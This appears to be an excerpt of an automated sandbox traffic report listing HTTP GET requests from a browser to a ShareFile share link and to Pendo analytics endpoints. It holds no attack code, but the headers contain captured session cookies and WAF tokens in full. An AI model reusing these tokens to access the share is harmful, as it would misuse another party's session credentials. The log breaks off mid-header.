Source: global trafficHTTP traffic detected: GET /bundles/b69d9728d2dbe0747c8a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1730835389613&v=2.253.1_prod HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/3aa33bb6fffd83a61c47.svg HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VDDZ1kYLnpSvc8wjruJPZrzWTtBlo/C9PiM5B0Z1xgsMKoybEw3LFeco+8+z8WqFx7C/I5REF14zHBTYGmtM6RL3XF8+k8ecSuIoyey4SFC2FklAWScgEDOrCKiZP0jWaZcZl9FifmA8FbrMy50yXNRKV14YRohLf2qvieBsTyue; AWSALBTGCORS=VDDZ1kYLnpSvc8wjruJPZrzWTtBlo/C9PiM5B0Z1xgsMKoybEw3LFeco+8+z8WqFx7C/I5REF14zHBTYGmtM6RL3XF8+k8ecSuIoyey4SFC2FklAWScgEDOrCKiZP0jWaZcZl9FifmA8FbrMy50yXNRKV14YRohLf2qvieBsTyue; AWSALB=u+/YADoA9Wgw7rR3hc8lZAP3Hvesd1oW0gArQRSsObwlKcx6BGnNQPE4Alhl7MZKHZgQ/3O+IZDcFqPU5N1Q4MspFtvFc0phwgFPyMVmw0pjp5edYZ5lcZQggOil; AWSALBCORS=u+/YADoA9Wgw7rR3hc8lZAP3Hvesd1oW0gArQRSsObwlKcx6BGnNQPE4Alhl7MZKHZgQ/3O+IZDcFqPU5N1Q4MspFtvFc0phwgFPyMVmw0pjp5edYZ5lcZQggOil
Source: global trafficHTTP traffic detected: GET /data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNUM2K2zAQfhedY1uW_BP71pIeetjdQtrCphQzlsaJQJYcWc5Slrx7xjmk9LL0Nhp9v_POLmY20YevmrWs-_bleffSfe9ez_n589Oh2fMD2zBQyi8u3iEgqm2leZGUCH2ih3pIyoqLRCnZ5LroBcotUZZgCXyKcZrbLIMLBrT2BCGYEVw604SDsZgqP2b3V3Yx-JbNsm8qldey4koXEuteKxhECULWvBk0J2lv9c-_md1i7YaNGEFDBNY-Cq2j-aCUBXdc4IiEQNf92LPro-hKhWna-RGMo_9_4hL1LvufhxgQ4hJwZu0v5mVV0gqdCn-miBpJ37LfZDyRgYufHva0ojprNl5meZ4JLgpi0hln49dIIhWlTPNuCl6z6_UG5AqPbQ&v=2.253.1_prod&ct=1730835389612 HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.253.1_prod&ct=1730835389607&jzb=eJzVk19P2zAUxb-Ln9vGseOk6VtRpzEhtlW0oIFQ5MQ3xVv-1XHKMtTvznWpInipNmnTxJud6-t7jn8nd0_E9g2QGdEKKqvznoxIaurHFkxidYkVP-J0ygWfxiKORmSnW21rk2iFTcnXD58XX5JV8m3rb88ub-MreosXyCyru8q-nJEsnIaKBmMBMh2rPMrHIqRsnGU89lWQMuBT7OlMgYcfrG3amefJHRgoigdpjC5lNWlxBbkuYJLVpXfYeTsNj17L0zjMUGNIMxVwiFKVyZwJyXhE41xRvLoxddOS2ROpC5X8jn537rWHqiuKf-V8j_rQTWVXMv00zLIvG_LL_vwxV5dwnt6sNvFyiSNyI0s4FC_6-ffr5cfALHbn3eO6wWIL2w6qDLFR5NhbQN9BJPajgXMJVp5kHL9vxkftbnlKfiGrTSc37kWgStZXjsPRkmuVTbOoS6krrL_Rha1_4jgHaTvjKNyRmocCPyEe0zcWFOD9BbkfAjAfxuMnJa3TRoXn-x6jLMBOfK9W104SmzDBJ36CrtVfT1DrhhzKlZ9x2dPV2fXN2lzYxZuA-UPARBy-ClhRS3UiYCHFZL7ngDl_R1csRjIT_Lv-CwA2AOAR298_A_pm1ME HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /guide.-323232.1622565221517.css HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/b79627b64df3ab63890d.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=jdA3diz0wNhpyekRiBPpb8w1iM0coaRH4YdAnvtJ5gdEP8gIfFE3KpSIh+mrzYX7OX3zjj+R7cH+3mtmCEbzEY5ilfpNN0iZ0i1zpuiSRBfrum3rWFVqnaynAwNZ5sHGL4zcHGM+7NQq6jXYchNH0sPcR6DtzO07exhkd6n3nZ2e; AWSALBTGCORS=jdA3diz0wNhpyekRiBPpb8w1iM0coaRH4YdAnvtJ5gdEP8gIfFE3KpSIh+mrzYX7OX3zjj+R7cH+3mtmCEbzEY5ilfpNN0iZ0i1zpuiSRBfrum3rWFVqnaynAwNZ5sHGL4zcHGM+7NQq6jXYchNH0sPcR6DtzO07exhkd6n3nZ2e; AWSALB=ItfF+YedMyKrCAW869KzE4qwDMNwQtmDj7zi5p90mQi+DPc3T7/ThVAaGCZ8E3vAZ67ypfITehhagFq0S2nh22z6OYYwNritfEQCvt1lBKbPh9ULU/5Ty45ClOOa; AWSALBCORS=ItfF+YedMyKrCAW869KzE4qwDMNwQtmDj7zi5p90mQi+DPc3T7/ThVAaGCZ8E3vAZ67ypfITehhagFq0S2nh22z6OYYwNritfEQCvt1lBKbPh9ULU/5Ty45ClOOa
Source: global trafficHTTP traffic detected: GET /bundles/b69d9728d2dbe0747c8a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALBTGCORS=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALB=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO; AWSALBCORS=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO
Source: global trafficHTTP traffic detected: GET /bundles/5be3ba1b444ac539eaf5.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALBTGCORS=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALB=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO; AWSALBCORS=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO
Source: global trafficHTTP traffic detected: GET /bundles/4229061ac836f0f16eea.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALBTGCORS=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALB=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO; AWSALBCORS=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO
Source: global trafficHTTP traffic detected: GET /bundles/1c992ae0c14e95098d9a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALBTGCORS=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALB=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO; AWSALBCORS=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO
Source: global trafficHTTP traffic detected: GET /io/public/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)?%24expand=Items%2CItems%2FBundle%2CUser%2CUser%2FPreferences%2CCreator%2CCreator%2FAccount%2CItems%2FZone&includeExpired=false HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"tracestate: 3347059@nr=0-1-294030-30142649-0fd61ce053ddb607----1730835391079traceparent: 00-89782f7379cf02771cecc1a545eb6e37-0fd61ce053ddb607-01Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI5NDAzMCIsImFwIjoiMzAxNDI2NDkiLCJpZCI6IjBmZDYxY2UwNTNkZGI2MDciLCJ0ciI6Ijg5NzgyZjczNzljZjAyNzcxY2VjYzFhNTQ1ZWI2ZTM3IiwidGkiOjE3MzA4MzUzOTEwNzksInRrIjoiMzM0NzA1OSJ9fQ==X-BFF-CSRF: trueAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brCookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALBTGCORS=pEJQviEcfO4ngpW1naAA2hs+yT+NIDQCKVetcPvSxPOiffcJwwk5uIt7EwK1oGzA0uIZSV5LEgQ1H99/hELvn+/6J+XoLk5mq5ARuADPaATjVrzL6Y02j49hw2bhlvcMjUjd8Dt7e/3siHJz4ZoY3BKyX2m03VA628ypmM14e8kd; AWSALB=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO; AWSALBCORS=6C+7Q/HpJZlkcz+tIOovhP3fzNJ9jB6BaqXFIHxxQeXevjrCGND9+ObVceVWePWabLGFfQgCunZ8O5ovCV3TJkhN7xkFAESN4aH+kEWLZaMu3ZDnnY79/o8cgGUO
Source: global trafficHTTP traffic detected: GET /data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.253.1_prod&ct=1730835389607&jzb=eJzVk19P2zAUxb-Ln9vGseOk6VtRpzEhtlW0oIFQ5MQ3xVv-1XHKMtTvznWpInipNmnTxJud6-t7jn8nd0_E9g2QGdEKKqvznoxIaurHFkxidYkVP-J0ygWfxiKORmSnW21rk2iFTcnXD58XX5JV8m3rb88ub-MreosXyCyru8q-nJEsnIaKBmMBMh2rPMrHIqRsnGU89lWQMuBT7OlMgYcfrG3amefJHRgoigdpjC5lNWlxBbkuYJLVpXfYeTsNj17L0zjMUGNIMxVwiFKVyZwJyXhE41xRvLoxddOS2ROpC5X8jn537rWHqiuKf-V8j_rQTWVXMv00zLIvG_LL_vwxV5dwnt6sNvFyiSNyI0s4FC_6-ffr5cfALHbn3eO6wWIL2w6qDLFR5NhbQN9BJPajgXMJVp5kHL9vxkftbnlKfiGrTSc37kWgStZXjsPRkmuVTbOoS6krrL_Rha1_4jgHaTvjKNyRmocCPyEe0zcWFOD9BbkfAjAfxuMnJa3TRoXn-x6jLMBOfK9W104SmzDBJ36CrtVfT1DrhhzKlZ9x2dPV2fXN2lzYxZuA-UPARBy-ClhRS3UiYCHFZL7ngDl_R1csRjIT_Lv-CwA2AOAR298_A_pm1ME HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /io/public/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)?%24expand=Items%2CItems%2FBundle%2CUser%2CUser%2FPreferences%2CCreator%2CCreator%2FAccount%2CItems%2FZone&includeExpired=false HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; 